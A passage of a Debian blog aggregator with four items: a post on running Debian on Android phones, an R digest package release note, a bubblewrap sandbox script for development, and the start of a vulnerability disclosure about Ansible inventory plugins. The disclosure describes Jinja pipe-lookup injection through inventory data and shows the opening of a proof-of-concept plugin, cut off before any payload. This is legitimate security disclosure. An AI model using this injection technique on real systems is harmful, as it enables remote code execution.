<p>The <a href="https://en.wikipedia.org/wiki/Libhybris">libhybris libraries are a compatibility layer between Android and glibc programs [4]</a>. Which includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set and are available in Australia and which could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.</p>
<table>
<tbody><tr>
<th>Phone</th>
<th>RAM</th>
<th>External Display</th>
<th>Price</th>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/pstar/">Edge 20 Pro [5]</a></td>
<td>6-12G</td>
<td>HDMI</td>
<td>$500 not many on sale</td>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/nio/variant1/">Edge S aka moto G100 [6]</a></td>
<td>6-8G</td>
<td>HDMI</td>
<td>$500 to $600+</td>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/FP4/">Fairphone 4</a></td>
<td>6-8G</td>
<td>USBC-DP</td>
<td>$1000+</td>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/nx659j/variant1/">Nubia Red Magic 5G</a></td>
<td>8-16G</td>
<td>USBC-DP</td>
<td>$600+</td>
</tr>
</tbody></table>
<p>The <a href="https://wiki.lineageos.org/devices/">LineageOS device search page [9]</a> allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 – which aren’t in the <a href="https://www.kernel.org/category/releases.html">kernel.org supported release list [10]</a>. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers, until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop.</p>
<p><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3362-open-source-for-sustainable-and-long-lasting-phones/">Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]</a>. But they don’t have the market power that companies like Google have to tell SoC vendors what they want.</p>
<h2>IP Laws and Practices</h2>
<p><a href="https://www.bunniestudios.com/blog/?p=4297">Bunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]</a>. This is a major factor in the lack of support for FOSS on phones and other devices.</p>
<h2>Droidian and Buying a Note 9</h2>
<p>The FOSDEM 2023 has <a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3165-droidian-bridging-the-gap-between-various-platforms-with-convergence/">a lecture about the Droidian project which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]</a>. It’s interesting how they use containers for the necessary Android apps. Here is the <a href="https://devices.droidian.org/">list of devices supported by Droidian [14]</a>.</p>
<p>Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from <a href="https://volla.online/en/">Volla – a company dedicated to making open Android based devices [15]</a>. But they don’t seem to be available on ebay and the new price of the Volla Phone 22 is E452 ($AU750) which is more than I want to pay for a device that isn’t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.</p>
<table>
<tbody><tr>
<th>Phone</th>
<th>RAM</th>
<th>Price</th>
<th>Issues</th>
</tr>
<tr>
<td>Note 9 128G/512G</td>
<td>6G/8G</td>
<td><$300</td>
<td>Not supporting external display</td>
</tr>
<tr>
<td>Galaxy S9+</td>
<td>6G</td>
<td><$300</td>
<td>Not supporting external display</td>
</tr>
<tr>
<td>Xperia 5</td>
<td>6G</td>
<td>>$300</td>
<td>Hotspot partly working</td>
</tr>
<tr>
<td>OnePlus 3T</td>
<td>6G</td>
<td>$200 – $400+</td>
<td>photos not working</td>
</tr>
</tbody></table>
<p>I just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian, it has some screen burn but that’s OK for a test system and if I end up using it seriously I’ll just buy another that’s in as-new condition. With no support for an external display I’ll need to setup a software dock to do Convergence, but that’s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I’ll use the 512G/8G model for that and use the cheap one for testing.</p>
<h2>Mobian</h2>
<p>I should have checked the Mobian list first as it’s the main Debian variant for phones.</p>
<p>From the <a href="https://wiki.debian.org/Mobian/Devices">Mobian Devices list [16]</a> the OnePlus 6T has 8G of RAM or more but isn’t available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn’t seem to be available on ebay. The <a href="https://shop.shiftphones.com/shift6mq.html">Shift6mq is made by a German company with similar aims to the Fairphone [17]</a>, it looks nice but costs E577 which is more than I want to spend and isn’t on the officially supported list.</p>
<h2>Smart Watches</h2>
<p>The same issues apply to smart watches. <a href="https://asteroidos.org/watches/">AstereoidOS is a free smart phone OS designed for closed hardware [18]</a>. I don’t have time to get involved in this sort of thing though, I can’t hack on every device I use.</p>
<ul>
<li>[1]<a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/"> https://etbe.coker.com.au/2023/05/29/considering-convergence/</a></li>
<li>[2]<a href="https://en.wikipedia.org/wiki/PinePhone_Pro"> https://en.wikipedia.org/wiki/PinePhone_Pro</a></li>
<li>[3]<a href="https://wiki.postmarketos.org/wiki/Devices"> https://wiki.postmarketos.org/wiki/Devices</a></li>
<li>[4]<a href="https://en.wikipedia.org/wiki/Libhybris"> https://en.wikipedia.org/wiki/Libhybris</a></li>
<li>[5]<a href="https://wiki.lineageos.org/devices/pstar/"> https://wiki.lineageos.org/devices/pstar/</a></li>
<li>[6]<a href="https://wiki.lineageos.org/devices/nio/variant1/"> https://wiki.lineageos.org/devices/nio/variant1/</a></li>
<li>[7]<a href="https://wiki.lineageos.org/devices/FP4/"> https://wiki.lineageos.org/devices/FP4/</a></li>
<li>[8]<a href="https://wiki.lineageos.org/devices/nx659j/variant1/"> https://wiki.lineageos.org/devices/nx659j/variant1/</a></li>
<li>[9]<a href="https://wiki.lineageos.org/devices/"> https://wiki.lineageos.org/devices/</a></li>
<li>[10]<a href="https://www.kernel.org/category/releases.html"> https://www.kernel.org/category/releases.html</a></li>
<li>[11]<a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3362-open-source-for-sustainable-and-long-lasting-phones/"> https://tinyurl.com/ykdbxf4a</a></li>
<li>[12]<a href="https://www.bunniestudios.com/blog/?p=4297"> https://www.bunniestudios.com/blog/?p=4297</a></li>
<li>[13]<a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3165-droidian-bridging-the-gap-between-various-platforms-with-convergence/"> https://tinyurl.com/29jfaw4f</a></li>
<li>[14]<a href="https://devices.droidian.org/"> https://devices.droidian.org/</a></li>
<li>[15]<a href="https://volla.online/en/"> https://volla.online/en/</a></li>
<li>[16]<a href="https://wiki.debian.org/Mobian/Devices"> https://wiki.debian.org/Mobian/Devices</a></li>
<li>[17]<a href="https://shop.shiftphones.com/shift6mq.html"> https://shop.shiftphones.com/shift6mq.html</a></li>
<li>[18]<a href="https://asteroidos.org/watches/"> https://asteroidos.org/watches/</a></li>
</ul>
<div class="yarpp yarpp-related yarpp-related-rss yarpp-template-list">
<p>Related posts:</p><ol>
<li><a href="https://etbe.coker.com.au/2010/01/27/australian-open-android-seer/" rel="bookmark" title="The Australian Open and Android Phones (Seer)">The Australian Open and Android Phones (Seer)</a> <small>On Monday the 25th of January 2010 I visited the...</small></li>
<li><a href="https://etbe.coker.com.au/2011/10/27/dual-sim-amaysim-contract/" rel="bookmark" title="Dual SIM Phones vs Amaysim vs Contract for Mobile Phones">Dual SIM Phones vs Amaysim vs Contract for Mobile Phones</a> <small>Currently Dick Smith is offering two dual-SIM mobile phones for...</small></li>
<li><a href="https://etbe.coker.com.au/2022/12/15/pixel-6a/" rel="bookmark" title="Pixel 6A">Pixel 6A</a> <small>I have just bought a Pixel 6A [1] for my...</small></li>
</ol>
</div>2024-03-12T10:35:41+00:00etbeDirk Eddelbuettel: digest 0.6.35 on CRAN: New xxhash code
http://dirk.eddelbuettel.com/blog/2024/03/11#digest_0.6.35
<p>Release 0.6.35 of the <a href="https://dirk.eddelbuettel.com/code/digest.html">digest</a> package
arrived at <a href="https://cran.r-project.org">CRAN</a> today and has
also been uploaded to <a href="https://www.debian.org">Debian</a>
already.</p>
<p><a href="https://dirk.eddelbuettel.com/code/digest.html">digest</a>
creates hash digests of arbitrary R objects. It can use a number
different hashing algorithms (<code>md5</code>, <code>sha-1</code>,
<code>sha-256</code>, <code>sha-512</code>, <code>crc32</code>,
<code>xxhash32</code>, <code>xxhash64</code>, <code>murmur32</code>,
<code>spookyhash</code>, <code>blake3</code>,<code>crc32c</code> – and
now also <code>xxh3_64</code> and <code>xxh3_128</code>), and enables
easy comparison of (potentially large and nested) R language objects as
it relies on the native serialization in R. It is a mature and
widely-used package (with 65.8 million downloads just on the partial
cloud mirrors of CRAN which keep logs) as many tasks may involve
<em>caching</em> of objects for which it provides convenient
general-purpose hash key generation to quickly identify the various
objects.</p>
<p>This release updates the included <a href="https://github.com/Cyan4973/xxHash">xxHash</a> version to the
current verion 0.8.2 updating the existing <code>xxhash32</code> and
<code>xxhash64</code> hash functions — and also adding the newer
<code>xxh3_64</code> and <code>xxh3_128</code> ones. We have a project
at work using <code>xxh3_128</code> from Python which made me realize
having it from R would be nice too, and given the existing
infrastructure in the package actually doing so was fairly quick and
straightforward.</p>
<p>My <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>
provides a summary of changes to the <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/11/#digest_0.6.35">previous
version</a>. For questions or comments use the <a href="https://github.com/eddelbuettel/digest/issues">issue tracker</a>
off the <a href="https://github.com/eddelbuettel/digest">GitHub
repo</a>. For documentation (including the <a href="https://eddelbuettel.github.io/digest/changelog/">changelog</a>)
see the <a href="https://eddelbuettel.github.io/digest/">documentation
site</a>.</p>
<p>If you like this or other open-source work I do, you can now <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-11T23:23:00+00:00Dirk EddelbuettelJoachim Breitner: Convenient sandboxed development environment
https://www.joachim-breitner.de/blog/812-Convenient_sandboxed_development_environment
<p>I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a <code>cabal install</code>, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy.</p>
<p>In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.</p>
<h3 id="convenient-or-it-wont-happen">Convenient or it won’t happen</h3>
<p>Nevertheless I thought I should do something about this. The safest option would probably to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenient, and one that does not get too much in the way of my current habits.</p>
<p>For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are (unlikely) to run code (e.g. <code>git push</code>, <code>git pull</code> from private repositories, <code>gh pr create</code>) from “the outside”, and the actual build environment can do without access to these secrets.</p>
<p>The user experience I thus want is a quick way to enter a “development environment” where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual <code>/home</code> directory.</p>
<p>I initially followed the blog post <a href="https://msucharski.eu/posts/application-isolation-nixos-containers/">“Application Isolation using NixOS Containers” by Marcin Sucharski</a> and got something working that mostly did what I wanted, but then a colleague pointed out that tools like <a href="https://github.com/netblue30/firejail"><code>firejail</code></a> can achieve roughly the same with a less “global” setup. I tried to use <code>firejail</code>, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool <a href="https://www.joachim-breitner.de/blog/tag/Bubblewrap">https://github.com/containers/bubblewrap</a>.</p>
<h3 id="selective-bubblewrapping">Selective bubblewrapping</h3>
<p>This script, called <code>dev</code> and included below, builds a new filesystem namespace with minimal <code>/proc</code> and <code>/dev</code> directories, it’s own <code>/tmp</code> directories. It then binds-mound some directories to make the host’s NixOS system available inside the container (<code>/bin</code>, <code>/usr</code>, the nix store including domain socket, stuff for OpenGL applications). My user’s home directory is taken from <code>~/.dev-home</code> and some configuration files are bind-mounted for convenient sharing. I intentionally don’t share most of the configuration – for example, a <code>direnv enable</code> in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding <code>.Xauthority</code> file is made available. And finally, if I run <code>dev</code> in a project directory, this project directory is bind mounted writable, and the current working directory is preserved.</p>
<p>The effect is that I can type <code>dev</code> on the command line to enter “dev mode” rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a <code>git push</code> I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.</p>
<p>Clearly, isn’t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in <code>$HOME</code>.</p>
<h3 id="rough-corners">Rough corners</h3>
<p>There is more polishing that could be done.</p>
<ul>
<li><p>In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a <a href="https://github.com/flatpak/xdg-desktop-portal">xdg-desktop-portal</a> user service, a <a href="https://github.com/flatpak/xdg-dbus-proxy">filtering dbus proxy</a>, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get <code>xdg-desktop-portal</code> to heed my default browser settings…). For now I will live with manually copying and pasting URLs, we’ll see how long this lasts.</p></li>
<li><p>With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: There is simply no point in running <code>evolution</code> or <code>firefox</code> inside the container, and if I do not even have VSCode or <code>cabal</code> available outside, so that it’s less likely that I forget to enter <code>dev</code> before using these tools.</p>
<p>It shouldn’t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to <code>bubblewrap</code> here.</p></li>
</ul>
<p>So likely I will refine this some more over time. Or get tired of typing <code>dev</code> and going back to what I did before…</p>
<h3 id="the-script">The script</h3>
<details>
The <code>dev</code> script (at the time of writing)
<div class="sourceCode" id="cb1"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb1-1"><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-1" tabindex="-1"><span class="co">#!/usr/bin/env bash</span></a></span><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-1" tabindex="-1">
<span id="cb1-2"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-2" tabindex="-1">
<span id="cb1-3"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-3" tabindex="-1"><span class="va">extra</span><span class="op">=</span><span class="va">()</span>
<span id="cb1-4"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-4" tabindex="-1"><span class="cf">if</span> <span class="kw">[[</span> <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> <span class="ot">==</span> /home/jojo/build/<span class="pp">*</span> <span class="kw">]]</span> <span class="kw">||</span> <span class="kw">[[</span> <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> <span class="ot">==</span> /home/jojo/projekte/programming/<span class="pp">*</span> <span class="kw">]]</span>
<span id="cb1-5"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-5" tabindex="-1"><span class="cf">then</span>
<span id="cb1-6"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-6" tabindex="-1"><span class="va">extra</span><span class="op">+=</span><span class="va">(</span>--bind <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> --chdir <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span><span class="va">)</span>
<span id="cb1-7"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-7" tabindex="-1"><span class="cf">fi</span>
<span id="cb1-8"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-8" tabindex="-1">
<span id="cb1-9"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-9" tabindex="-1"><span class="cf">if</span> <span class="bu">[</span> <span class="ot">-n</span> <span class="st">"</span><span class="va">$1</span><span class="st">"</span> <span class="bu">]</span>
<span id="cb1-10"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-10" tabindex="-1"><span class="cf">then</span>
<span id="cb1-11"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-11" tabindex="-1"> <span class="va">cmd</span><span class="op">=</span><span class="va">(</span> <span class="st">"</span><span class="va">$@</span><span class="st">"</span> <span class="va">)</span>
<span id="cb1-12"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-12" tabindex="-1"><span class="cf">else</span>
<span id="cb1-13"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-13" tabindex="-1"> <span class="va">cmd</span><span class="op">=</span><span class="va">(</span> bash <span class="va">)</span>
<span id="cb1-14"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-14" tabindex="-1"><span class="cf">fi</span>
<span id="cb1-15"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-15" tabindex="-1">
<span id="cb1-16"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-16" tabindex="-1"><span class="co"># Caveats:</span>
<span id="cb1-17"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-17" tabindex="-1"><span class="co"># * access to all of `/etc`</span>
<span id="cb1-18"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-18" tabindex="-1"><span class="co"># * access to `/nix/var/nix/daemon-socket/socket`, and is trusted user (but needed to run nix)</span>
<span id="cb1-19"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-19" tabindex="-1"><span class="co"># * access to X11</span>
<span id="cb1-20"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-20" tabindex="-1">
<span id="cb1-21"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-21" tabindex="-1"><span class="bu">exec</span> bwrap <span class="dt">\</span>
<span id="cb1-22"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-22" tabindex="-1"> <span class="at">--unshare-all</span> <span class="dt">\</span>
<span id="cb1-23"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-23" tabindex="-1"><span class="dt">\</span>
<span id="cb1-24"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-24" tabindex="-1"><span class="kw">`</span><span class="co"># blank slate</span><span class="kw">`</span> <span class="dt">\</span>
<span id="cb1-25"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-25" tabindex="-1"> <span class="at">--share-net</span> <span class="dt">\</span>
<span id="cb1-26"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-26" tabindex="-1"> <span class="at">--proc</span> /proc <span class="dt">\</span>
<span id="cb1-27"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-27" tabindex="-1"> <span class="at">--dev</span> /dev <span class="dt">\</span>
<span id="cb1-28"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-28" tabindex="-1"> <span class="at">--tmpfs</span> /tmp <span class="dt">\</span>
<span id="cb1-29"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-29" tabindex="-1"> <span class="at">--tmpfs</span> /run/user/1000 <span class="dt">\</span>
<span id="cb1-30"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-30" tabindex="-1"><span class="dt">\</span>
<span id="cb1-31"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-31" tabindex="-1"><span class="kw">`</span><span class="co"># Needed for GLX applications, in paticular alacritty</span><span class="kw">`</span> <span class="dt">\</span>
<span id="cb1-32"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-32" tabindex="-1"> <span class="at">--dev-bind</span> /dev/dri /dev/dri <span class="dt">\</span>
<span id="cb1-33"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-33" tabindex="-1"> <span class="at">--ro-bind</span> /sys/dev/char /sys/dev/char <span class="dt">\</span>
<span id="cb1-34"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-34" tabindex="-1"> <span class="at">--ro-bind</span> /sys/devices/pci0000:00 /sys/devices/pci0000:00 <span class="dt">\</span>
<span id="cb1-35"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-35" tabindex="-1"> <span class="at">--ro-bind</span> /run/opengl-driver /run/opengl-driver <span class="dt">\</span>
<span id="cb1-36"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-36" tabindex="-1"><span class="dt">\</span>
<span id="cb1-37"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-37" tabindex="-1"> <span class="at">--ro-bind</span> /bin /bin <span class="dt">\</span>
<span id="cb1-38"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-38" tabindex="-1"> <span class="at">--ro-bind</span> /usr /usr <span class="dt">\</span>
<span id="cb1-39"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-39" tabindex="-1"> <span class="at">--ro-bind</span> /run/current-system /run/current-system <span class="dt">\</span>
<span id="cb1-40"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-40" tabindex="-1"> <span class="at">--ro-bind</span> /nix /nix <span class="dt">\</span>
<span id="cb1-41"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-41" tabindex="-1"> <span class="at">--ro-bind</span> /etc /etc <span class="dt">\</span>
<span id="cb1-42"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-42" tabindex="-1"> <span class="at">--ro-bind</span> /run/systemd/resolve/stub-resolv.conf /run/systemd/resolve/stub-resolv.conf <span class="dt">\</span>
<span id="cb1-43"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-43" tabindex="-1"><span class="dt">\</span>
<span id="cb1-44"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-44" tabindex="-1"> <span class="at">--bind</span> ~/.dev-home /home/jojo <span class="dt">\</span>
<span id="cb1-45"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-45" tabindex="-1"> <span class="at">--ro-bind</span> ~/.config/alacritty ~/.config/alacritty <span class="dt">\</span>
<span id="cb1-46"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-46" tabindex="-1"> <span class="at">--ro-bind</span> ~/.config/nvim ~/.config/nvim <span class="dt">\</span>
<span id="cb1-47"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-47" tabindex="-1"> <span class="at">--ro-bind</span> ~/.local/share/nvim ~/.local/share/nvim <span class="dt">\</span>
<span id="cb1-48"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-48" tabindex="-1"> <span class="at">--ro-bind</span> ~/.bin ~/.bin <span class="dt">\</span>
<span id="cb1-49"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-49" tabindex="-1"><span class="dt">\</span>
<span id="cb1-50"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-50" tabindex="-1"> <span class="at">--bind</span> /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 <span class="dt">\</span>
<span id="cb1-51"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-51" tabindex="-1"> <span class="at">--bind</span> ~/.Xauthority ~/.Xauthority <span class="dt">\</span>
<span id="cb1-52"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-52" tabindex="-1"> <span class="at">--setenv</span> DISPLAY :0 <span class="dt">\</span>
<span id="cb1-53"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-53" tabindex="-1"><span class="dt">\</span>
<span id="cb1-54"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-54" tabindex="-1"> <span class="at">--setenv</span> container dev <span class="dt">\</span>
<span id="cb1-55"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-55" tabindex="-1"> <span class="st">"</span><span class="va">${extra</span><span class="op">[@]</span><span class="va">}</span><span class="st">"</span> <span class="dt">\</span>
<span id="cb1-56"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-56" tabindex="-1"> <span class="at">--</span> <span class="dt">\</span>
<span id="cb1-57"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-57" tabindex="-1"> <span class="st">"</span><span class="va">${cmd</span><span class="op">[@]</span><span class="va">}</span><span class="st">"</span></a></code></pre></div><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-57" tabindex="-1">
</a></details>2024-03-11T20:39:58+00:00Joachim BreitnerEvgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins
https://www.die-welt.net/2024/03/remote-code-execution-in-ansible-dynamic-inventory-plugins/
<p>I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.</p>
<h3>TL;DR</h3>
<p>Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.</p>
<h3>Inventory plugins</h3>
<p><a href="https://docs.ansible.com/ansible/latest/plugins/inventory.html#inventory-plugins">Inventory plugins</a> allow Ansible to pull inventory data from a variety of sources.
The most common ones are probably the ones fetching instances from clouds like <a href="https://docs.ansible.com/ansible/latest/collections/amazon/aws/aws_ec2_inventory.html">Amazon EC2</a>
and <a href="https://docs.ansible.com/ansible/latest/collections/hetzner/hcloud/hcloud_inventory.html">Hetzner Cloud</a> or the ones talking to tools like <a href="https://theforeman.org/">Foreman</a>.</p>
<p>For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any).
But it can also set any arbitrary variable for that host, which is often used to provide additional information about it.
These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.</p>
<p>And this is where things are getting interesting.
Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host.
And if that comment contains a <a href="https://jinja.palletsprojects.com/">Jinja</a> expression, it might get executed.
And if that Jinja expression is using the <a href="https://docs.ansible.com/ansible/latest/plugins/lookup.html"><code>pipe</code> lookup</a>, it might get executed in your shell.</p>
<p>Let that sink in for a moment, and then we'll look at an example.</p>
<h3>Example inventory plugin</h3>
<div class="code"><pre class="code literal-block"><span class="kn">from</span> <span class="nn">ansible.plugins.inventory</span> <span class="kn">import</span> <span class="n">BaseInventoryPlugin</span>
<span class="k">class</span> <span class="nc">InventoryModule</span><span class="p">(</span><span class="n">BaseInventoryPlugin</span><span class="p">):</span>
<span class="n">NAME</span> <span class="o">=</span> <span class="s1">'evgeni.inventoryrce.inventory'</span>
<span class="k">def</span> <span class="nf">verify_file</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">path</span><span class="p">):</span>
<span class="n">valid</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">if</span> <span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">verify_file</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
<span class="k">if</span> <span class="n">path</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'evgeni.yml'</span><span class="p">):</span>
<span class="n">valid</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">return</span> <span class="n">valid</span>
<span class="k">def</span> <span class="nf">parse</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">add_host</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">,</span> <span class="s1">'ansible_connection'</span><span class="p">,</span> <span class="s1">'local'</span><span class="p">)</span>
